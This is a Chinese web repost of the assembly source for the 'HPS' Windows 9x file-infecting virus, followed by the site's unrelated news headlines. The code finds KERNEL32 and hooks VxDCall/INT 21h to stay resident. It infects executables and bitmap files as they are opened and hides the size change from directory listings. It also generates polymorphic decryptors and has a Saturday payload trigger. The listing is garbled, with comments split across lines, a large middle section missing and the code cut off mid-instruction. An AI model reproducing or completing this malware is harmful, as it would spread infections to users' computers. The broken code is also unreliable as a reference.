分享
 
 
 

HPS virus 源程序

王朝other·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

.386P

locals

jumps

.model flat,STDCALL

;Include the following files

include Win32api.inc

include Useful.inc

include Mz.inc

include Pe.inc

;Some externals only used on 1st generation

extrn ExitProcess:NEAR

extrn MessageBoxA:NEAR

;Virus equates

mem_size equ mem_end-mem_base ;Size of virus in

memory

inf_size equ inf_end-mem_base ;Size of virus in

files

base_default equ 00400000h ;Default host base

address

page_mem_size equ (mem_size+ \ ;Virus in memory

inf_size+ \ ;Virus copy for

infections

poly_max_size+ \ ;Poly decryptor

0FFFh)/1000h ;Size in memory pages

page_align equ 10000h ;Page allocation

alignment

SIZE_PADDING equ 00000065h ;Mark for infected

files

;Some equates stolen from VMM.h

PR_PRIVATE EQU 80000400h

PR_SHARED EQU 80060000h

PR_SYSTEM EQU 80080000h

PR_FIXED EQU 00000008h

PR_4MEG EQU 00000001h

PR_STATIC EQU 00000010h

PD_ZEROINIT EQU 00000001h

PD_NOINIT EQU 00000002h

PD_FIXEDZERO EQU 00000003h

PD_FIXED EQU 00000004h

PC_FIXED EQU 00000008h

PC_LOCKED EQU 00000080h

PC_LOCKEDIFDP EQU 00000100h

PC_WRITEABLE EQU 00020000h

PC_USER EQU 00040000h

PC_INCR EQU 40000000h

PC_PRESENT EQU 80000000h

PC_STATIC EQU 20000000h

PC_DIRTY EQU 08000000h

PCC_ZEROINIT EQU 00000001h

PCC_NOLIN EQU 10000000h

_TEXT segment dword use32 public 'CODE'

host_entry: xor ebp,ebp

call entry_1st_gen

xor eax,eax

push eax

call ExitProcess

_TEXT ends

_DATA segment dword use32 public 'DATA'

_DATA ends

_BSS segment dword use32 public 'BSS'

_BSS ends

virseg segment dword use32 public 'HPS'

mem_base equ this byte

virus_entry: call get_delta ;Get

delta-offset

get_delta: pop ebp ;into ebp and

mov eax,ebp ;host original

sub ebp,offset get_delta ;entry-point

in eax

db 2Dh ;sub eax,xxxx

infected_ep dd 00000000h

db 05h ;add eax,xxxx

original_ep dd 00000000h

push eax

entry_1st_gen: ;Scan memory looking for KERNEL32.dll

;We can do this without causing protection faults,

;just setup a structured exception handler to trap

faults

;produced by our scan

;Thanks to Jacky Qwerty for this piece of code

pushad

try_01: mov eax,080000101h

call IGetK32BaseAddr

jecxz try_02

jmp kernel_found

try_02: mov eax,0C0000101h

call IGetK32BaseAddr

jecxz try_03

jmp kernel_found

try_03: xor eax,eax

call IGetK32BaseAddr

kernel_found: mov dword ptr [esp.Pushad_ebx],ecx

popad

or ebx,ebx

jz init_error

mov eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_lfanew]

add eax,ebx

mov edi,dword ptr [eax+NT_OptionalHeader. \

OH_DirectoryEntries. \

DE_Export. \

DD_VirtualAddress]

add edi,ebx

mov esi,dword ptr [edi+ED_AddressOfFunctions]

add esi,ebx

xor edx,edx

address_loop: cmp edx,dword ptr [edi+ED_NumberOfFunctions]

jae init_error

mov ecx,00000008h-01h

function_loop: inc edx

lodsd

cmp eax,dword ptr [esi]

jne address_loop

loop function_loop

add eax,ebx

mov dword ptr [ebp+a_VxDCall],eax ;VxDCall found

;At this point we know how to call VxDCall api

;So we can use our int21h dispatcher to perform

;the residency check

mov eax,00002A00h

mov esi,"HPS!"

mov edi,"TSR?"

call my_int21h

cmp esi,"YES!"

je init_error

;Check if time to activate our payload

xor ecx,ecx

cmp al,06h ;Saturday?

jne activation_end

inc ecx

activation_end: mov dword ptr [ebp+bmp_active],ecx

;Well... Now lets use VxDCall to allocate some

;shared memory

;This memory will stay there after host termination

;and will be visible to all running processes

push PC_WRITEABLE or PC_USER

push page_mem_size ;# of pages

push PR_SHARED

PUSH 00010000h ;Call to

_PageReserve

call dword ptr [ebp+a_VxDCall] ;VxDCall0

cmp eax,0FFFFFFFFh ;Success?

je init_error

cmp eax,80000000h ;In shared

memory?

jb free_pages

mov dword ptr [ebp+mem_address],eax ;Save linnear

address

push PC_WRITEABLE or PC_USER or PC_PRESENT or PC_FIXED

push 00000000h

push PD_ZEROINIT

push page_mem_size ;# of pages

shr eax,0Ch ;Linnear page

number

push eax

push 00010001h ;Call to

_PageCommit

call dword ptr [ebp+a_VxDCall] ;VxDCall0

or eax,eax

je free_pages

commit_success: mov eax,dword ptr [ebp+mem_address] ;Point eax to

our

add eax,VxDCall_code-mem_base ;hook

procedure

mov dword ptr [ebp+ptr_location],eax ;Setup far jmp

mov dword ptr [ebp+hook_status],"FREE" ;Clear busy

flag

mov esi,dword ptr [ebp+a_VxDCall] ;VxDCall

entry-point

mov ecx,00000100h ;Explore 0100h

bytes

trace_VxDCall: lodsb

cmp al,2Eh

jne trace_next

cmp word ptr [esi],1DFFh

je get_int30h

trace_next: loop trace_VxDCall

free_pages: xor eax,eax

push eax

push dword ptr [ebp+mem_address]

push 0001000Ah ;Call to

_PageFree

call dword ptr [ebp+a_VxDCall] ;VxDCall0

jmp init_error

get_int30h: ;Before setting our hook lets generate one polymorphic

;decryptor... We will use this decryptor for each file

;infection... This is also known as slow-mutation

call mutate ;Generate

decryptor

;Now we have all the necesary information to hook

Windows

;calls to VxDCall function

;Save the 16:32 pointer to INT 30h instruction and

;overwrite it with the address of our hook procedure

cli

lodsw ;Skip FF 1D

opcodes

lodsd ;Get ptr to

INT 30h

push eax

mov esi,eax

mov edi,dword ptr [ebp+mem_address]

add edi,VxDCall_code-mem_base

mov ecx,00000006h

rep movsb

pop edi

mov eax,dword ptr [ebp+mem_address]

add eax,VxDCall_hook-mem_base

stosd

mov ax,cs ;Overwrite far

ptr

stosw

sti

init_error: lea ebp,dword ptr [esp+0000013Ch-00000004h]

ret

SEH_ExcptBlock macro

add esp,-cPushad

jnz GK32BA_L1

endm

IGetK32BaseAddr: @SEH_SetupFrame <SEH_ExcptBlock>

mov ecx,edx

xchg ax,cx

GK32BA_L0: dec cx

jz GK32BA_L2

add eax,-10000h

pushad

mov bx,-IMAGE_DOS_SIGNATURE

add bx,[eax]

mov esi,eax

jnz GK32BA_L1

mov ebx,-IMAGE_NT_SIGNATURE

add eax,[esi.MZ_lfanew]

mov edx,esi

add ebx,[eax]

jnz GK32BA_L1

add edx,[eax.NT_OptionalHeader.OH_DirectoryEntries \

.DE_Export.DD_VirtualAddress]

cld

add esi,[edx.ED_Name]

lodsd

and eax,not 20202020h

add eax,-'NREK'

jnz GK32BA_L1

lodsd

or ax,2020h

add eax,-'23le'

jnz GK32BA_L1

lodsb

xor ah,al

jz GK32BA_L1

add al,-'.'

lodsd

jnz GK32BA_L1

and eax,not 202020h

add eax,-'LLD'

GK32BA_L1: popad

jnz GK32BA_L0

xchg ecx,eax

inc eax

GK32BA_L2: @SEH_RemoveFrame

ret

include excpt.inc

VxDCall_hook: pushad

call mem_delta ;Get

mem_delta: pop ebp ;delta offset

sub ebp,offset mem_delta

cmp dword ptr [ebp+hook_status],"BUSY" ;Dont process

our

je exit_hook ;own calls

cmp eax,002A0010h ;VWIN32 VxD

int 21h?

jne exit_hook

mov eax,dword ptr [esp+0000002Ch]

cmp ax,2A00h ;Get system

je tsr_check

cmp ax,3D00h ;Open file

je infection_edx

cmp ax,3D01h ;Open file

je infection_edx ;read/write?

cmp ax,7143h ;X-Get/set

je infection_edx

cmp ax,714Eh ;LFN find

je stealth

cmp ax,714Fh ;LFN find next

je stealth

cmp ax,7156h ;LFN rename

je infection_edx

cmp ax,716Ch ;LFN extended

je infection_esi

cmp ax,71A8h ;Generate

je infection_esi

exit_hook: popad

do_far_jmp: ;Do a jmp fword ptr cs:[xxxxxxxx] into original code

db 2Eh,0FFh,2Dh

ptr_location dd 00000000h

tsr_check: cmp esi,"HPS!" ;Is our tsr

check?

jne exit_hook

cmp edi,"TSR?"

jne exit_hook

popad

mov esi,"YES!" ;Already

resident

jmp short do_far_jmp

stealth: mov eax,dword ptr [esp+00000028h] ;Save return

address

mov dword ptr [ebp+stealth_ret],eax

lea eax,dword ptr [ebp+api_ret] ;Set new ret

address

mov dword ptr [esp+00000028h],eax

mov dword ptr [ebp+find_data],edi ;Save

ptr2FindData

jmp exit_hook

api_ret: ;As result of the above code we will get control after

;int21h FindFirst or FindNext funcions

jc back2caller ;Exit if fail

pushad ;Save all

registers

call stealth_delta ;Delta offset

used

stealth_delta: pop ebp ;in stealth

routines

sub ebp,offset stealth_delta

db 0BFh ;mov edi,ptr

FindData

find_data dd 00000000h

xor eax,eax

cmp dword ptr [edi+WFD_nFileSizeHigh],eax

jne stealth_done

mov eax,dword ptr [edi+WFD_nFileSizeLow]

mov ecx,SIZE_PADDING

xor edx,edx

div ecx

or edx,edx

jnz stealth_done

lea esi,dword ptr [edi+WFD_szFileName] ;Ptr to

filename

push esi

call check_filename

pop esi

jc stealth_done

mov dword ptr [ebp+hook_status],"BUSY" ;Set busy flag

mov eax,0000716Ch ;LFN Ext

Open/Create

xor ebx,ebx ;Read

xor ecx,ecx ;Attribute

normal

xor edx,edx

inc edx ;Open existing

call my_int21h

jc stealth_done

mov ebx,eax

mov edx,dword ptr [edi+WFD_nFileSizeLow]

sub edx,00000004h

call seek_here

jc close_stealth

mov eax,00003F00h ;Read bytes

written

mov ecx,00000004h

lea edx,dword ptr [ebp+stealth_this]

call my_int21h

jc close_stealth

mov eax,dword ptr [ebp+stealth_this]

sub dword ptr [edi+WFD_nFileSizeLow],eax

close_stealth: mov eax,00003E00h ;Close file

call my_int21h

stealth_done: mov dword ptr [ebp+hook_status],"FREE" ;Clear busy

flag

popad ;Save all

registers

clc ;Return no

error

back2caller: push eax

push eax

db 0B8h ;Load eax with

the

stealth_ret dd 00000000h ;return

address

mov dword ptr [esp+00000004h],eax

pop eax

ret

infection_edx: mov esi,edx

infection_esi: mov dword ptr [ebp+hook_status],"BUSY" ;Set busy flag

call check_filename

jc exit_infection

mov dword ptr [ebp+ptr_filename],edx

mov esi,edx

xor ecx,ecx

cld

name_checksum: xor eax,eax

lodsb

or al,al

jz got_checksum

add ecx,eax

jmp short name_checksum

got_checksum: cmp dword ptr [ebp+last_checksum],ecx

je exit_infection

mov dword ptr [ebp+last_checksum],ecx

mov eax,00007143h ;LFN Ext

xor ebx,ebx ;Retrieve

lea edx,dword ptr [ebp+target_filename] ;Ptr to

call my_int21h

jc exit_infection

mov dword ptr [ebp+file_attrib],ecx ;Save original

mov eax,00007143h ;LFN Ext

mov bl,01h ;Set file

xor ecx,ecx ;Clear all

lea edx,dword ptr [ebp+target_filename] ;Ptr to

call my_int21h

jc exit_infection

mov eax,00007143h ;LFN Ext

mov bl,04h ;Retrieve last w

lea edx,dword ptr [ebp+target_filename] ;Ptr to

call my_int21h

jc exit_infection

mov dword ptr [ebp+file_time],ecx ;Save original

mov dword ptr [ebp+file_date],edi ;Save original

mov eax,0000716Ch ;LFN Ext

mov ebx,00000002h ;Read/Write

xor ecx,ecx ;Attribute

mov edx,00000001h ;Open existing

lea esi,dword ptr [ebp+target_filename] ;Ptr to

call my_int21h

jc exit_infection

mov ebx,eax

mov eax,00003F00h ;Read MsDos

mov ecx,IMAGE_SIZEOF_DOS_HEADER ;or bitmap

lea edx,dword ptr [ebp+msdos_header] ;header

call my_int21h

jc close_file

cmp word ptr [ebp+msdos_header],IMAGE_DOS_SIGNATURE

je executable

xor eax,eax

cmp dword ptr [ebp+bmp_active],eax

je close_file

cmp word ptr [ebp+msdos_header],"MB"

jne close_file

cmp dword ptr [ebp+msdos_header+0000001Ah],00080001h

jne close_file

;Skip .BMP files that use compression

xor eax,eax

cmp dword ptr [ebp+msdos_header+0000001Eh],eax

jne close_file

;Check bitmap size in bytes

mov eax,dword ptr [ebp+msdos_header+00000012h]

mov ecx,dword ptr [ebp+msdos_header+00000016h]

mul ecx

cmp eax,dword ptr [ebp+msdos_header+00000022h]

jne close_file

call seek_eof

cmp dword ptr [ebp+msdos_header+00000002h],eax

jne close_file

add eax,00000FFFh

xor edx,edx

mov ecx,00001000h

div ecx

mov dword ptr [ebp+bmp_pages],eax

push ebx

push PC_WRITEABLE or PC_USER

push eax ;# of pages

push PR_SYSTEM

PUSH 00010000h ;Call to

_PageReserve

call dword ptr [ebp+a_VxDCall] ;VxDCall0

pop ebx

cmp eax,0FFFFFFFFh ;Success?

je close_file

mov dword ptr [ebp+bmp_address],eax ;Save linnear

push ebx

push PC_WRITEABLE or PC_USER

push 00000000h

push PD_ZEROINIT

push dword ptr [ebp+bmp_pages] ;# of pages

shr eax,0Ch ;Linnear page

push eax

push 00010001h ;Call to

_PageCommit

call dword ptr [ebp+a_VxDCall] ;VxDCall0

pop ebx

or eax,eax

je free_bmp_mem

call seek_bof ;Return to bof

jc close_file

mov eax,00003F00h ;Read the

mov ecx,dword ptr [ebp+msdos_header+00000002h]

mov edx,dword ptr [ebp+bmp_address]

call my_int21h

jc free_bmp_mem

mov eax,dword ptr [ebp+bmp_address]

mov esi,dword ptr [eax+0000000Ah]

add esi,eax

cmp dword ptr [esi],0DEADBABEh ;Already

je free_bmp_mem

push esi

push edi

mov ecx,SIZE_PADDING

call rnd_fill

pop edi

;Decryptor done, save its size

pop eax

sub dword ptr [ebp+entry_point],eax

sub edi,eax

mov dword ptr [ebp+decryptor_size],edi

;Copy virus body to our buffer

lea esi,dword ptr [ebp+mem_base]

mov edi,dword ptr [ebp+mem_address]

mov ecx,mem_size

rep movsb

popad

ret

scramble_virus: lea esi,dword ptr [ebp+mem_base]

lea edi,dword ptr [esi+mem_size]

push edi

mov ecx,inf_size

cld

rep movsb

call fixed_size2ecx

pop edi

loop_hide_code: push ecx

mov eax,dword ptr [edi]

call perform_crypt

xor ecx,ecx

mov cl,byte ptr [ebp+oper_size]

loop_copy_res: stosb

shr eax,08h

loop loop_copy_res

pop ecx

loop loop_hide_code

ret

perform_crypt: ;This buffer will contain the code to "crypt" the

virus code

;followed by a RET instruction

db 10h dup (90h)

gen_get_delta: ;Lets generate polymorphic code for the following

pseudocode:

mov al,0E8h

stosb

;Let space for the address to call

stosd

mov dword ptr [ebp+delta_call],edi

push edi

;Generate some random data

call gen_rnd_block

;Get displacement from CALL instruction to destination

;address

mov eax,edi

pop esi

sub eax,esi

;Put destination address after CALL opcode

mov dword ptr [esi-00000004h],eax

call gen_garbage

mov al,58h

or al,byte ptr [ebp+index_mask]

stosb

call gen_garbage

;Make needed fixes to point index to start or end of

;encrypted code

mov eax,dword ptr [ebp+mem_address]

add eax,mem_size

add eax,dword ptr [ebp+ptr_disp]

sub eax,dword ptr [ebp+delta_call]

test byte ptr [ebp+build_flags],CRYPT_DIRECTION

jz fix_dir_ok

;Direction is from top to bottom

push eax

call fixed_size2ecx

xor eax,eax

mov al,byte ptr [ebp+oper_size]

push eax

mul ecx

pop ecx

sub eax,ecx

pop ecx

add eax,ecx

fix_dir_ok: push eax

;Fix using ADD or SUB?

call get_rnd32

and al,01h

jz fix_with_sub

fix_with_add: ;Generate ADD reg_index,fix_value

mov ax,0C081h

or ah,byte ptr [ebp+index_mask]

stosw

pop eax

jmp short fix_done

fix_with_sub: ;Generate SUB reg_index,-fix_value

mov ax,0E881h

or ah,byte ptr [ebp+index_mask]

stosw

pop eax

neg eax

fix_done: stosd

ret

gen_load_ctr: ;Easy now, just move counter random initial value

;into counter reg and calculate the end value

mov al,0B8h

or al,byte ptr [ebp+counter_mask]

stosb

call fixed_size2ecx

call get_rnd32

stosd

test byte ptr [ebp+build_flags],CRYPT_CDIR

jnz counter_down

counter_up: add eax,ecx

jmp short done_ctr_dir

counter_down: sub eax,ecx

done_ctr_dir: mov dword ptr [ebp+end_value],eax

ret

gen_decrypt: ;Check if we are going to use a displacement in the

;indexing mode

mov eax,dword ptr [ebp+ptr_disp]

or eax,eax

jnz more_complex

;Choose generator for [reg] indexing mode

mov edx,offset tbl_idx_reg

call choose_magic

jmp you_got_it

more_complex: ;More fun?!?!

mov al,byte ptr [ebp+build_flags]

test al,CRYPT_SIMPLEX

jnz crypt_xtended

;Choose generator for [reg+imm] indexing mode

mov edx,offset tbl_dis_reg

call choose_magic

you_got_it: ;Use magic to convert some values into

;desired instructions

call size_correct

mov dl,byte ptr [ebp+index_mask]

lodsb

or al,al

jnz adn_reg_01

cmp dl,00000101b

je adn_reg_02

adn_reg_01: lodsb

or al,dl

stosb

jmp common_part

adn_reg_02: lodsb

add al,45h

xor ah,ah

stosw

jmp common_part

crypt_xtended: ;Choose [reg+reg] or [reg+reg+disp]

test al,CRYPT_COMPLEX

jz ok_complex

;Get random displacement from current displacement

;eeehh?!?

mov eax,00000010h

call get_rnd_range

mov dword ptr [ebp+disp2disp],eax

call load_aux

push ebx

call gen_garbage

;Choose generator for [reg+reg+imm] indexing mode

mov edx,offset tbl_paranoia

call choose_magic

jmp short done_xtended

ok_complex: mov eax,dword ptr [ebp+ptr_disp]

call load_aux

push ebx

call gen_garbage

;Choose generator for [reg+reg] indexing mode

mov edx,offset tbl_xtended

call choose_magic

done_xtended: ;Build decryptor instructions

call size_correct

pop ebx

mov dl,byte ptr [ebp+index_mask]

lodsb

mov cl,al

or al,al

jnz arn_reg_01

cmp dl,00000101b

jne arn_reg_01

lodsb

add al,40h

stosb

jmp short arn_reg_02

arn_reg_01: movsb

arn_reg_02: mov al,byte ptr [ebx+REG_MASK]

shl al,03h

or al,dl

stosb

or cl,cl

jnz arn_reg_03

cmp dl,00000101b

jne arn_reg_03

xor al,al

stosb

arn_reg_03: ;Restore aux reg state

xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

common_part: ;Get post-build flags

lodsb

;Insert displacement from real address?

test al,MAGIC_PUTDISP

jz skip_disp

push eax

mov eax,dword ptr [ebp+ptr_disp]

sub eax,dword ptr [ebp+disp2disp]

neg eax

stosd

pop eax

skip_disp: ;Insert key?

test al,MAGIC_PUTKEY

jz skip_key

call copy_key

skip_key: ;Generate reverse code

call do_reverse

ret

choose_magic: mov eax,00000006h

call get_rnd_range

add edx,ebp

lea esi,dword ptr [edx+eax*04h]

lodsd

add eax,ebp

mov esi,eax

ret

size_correct: lodsb

mov ah,byte ptr [ebp+oper_size]

cmp ah,01h

je store_correct

inc al

cmp ah,04h

je store_correct

mov ah,66h

xchg ah,al

stosw

ret

store_correct: stosb

ret

load_aux: ;Get a valid auxiliary register

push eax

call get_valid_reg

or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

;Move displacement into aux reg

mov al,0B8h

or al,byte ptr [ebx+REG_MASK]

stosb

pop eax

neg eax

stosd

ret

do_reverse: xor eax,eax

mov al,byte ptr [ebp+oper_size]

shr eax,01h

shl

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有